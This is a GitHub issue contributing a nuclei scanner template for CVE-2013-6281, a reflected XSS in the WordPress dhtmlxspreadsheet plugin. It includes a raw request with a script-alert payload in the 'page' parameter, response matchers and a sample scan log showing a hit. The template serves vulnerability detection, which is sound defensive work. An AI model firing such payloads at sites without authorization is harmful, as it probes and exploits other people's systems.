search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9k stars 2.57k forks source link

WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS #4439

Closed random-robbie closed 2 years ago

random-robbie commented 2 years ago 
id: CVE-2013-6281

info:
  name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
  author: random-robbie
  severity: medium
  description: TThe dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bfc
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
    - https://www.securityfocus.com/bid/63256/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2013-6281
    cwe-id: CWE-79
  tags: cve,cve2013,wordpress,xss,wp-plugin

requests:
  - raw:
      - |
        GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1);</script>"

      - type: word
        part: body
        words:
          - "dhx_rel_path"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
nuclei --target http://xxxxx -t CVE-2013-6281.yaml

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   2.7.0

        projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Using Nuclei Engine 2.7.0 (outdated)
[INF] Using Nuclei Templates 9.0.1 (latest)
[INF] Templates added in last update: 23
[INF] Templates loaded for scan: 1
[2022-05-18 13:54:40] [CVE-2013-6281] [http] [medium] http://zzzzzzz/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(1);%3C/script%3E
princechaddha commented 2 years ago

Hello @random-robbie, thank you so much for sharing this template with the community and contributing to this project 🍻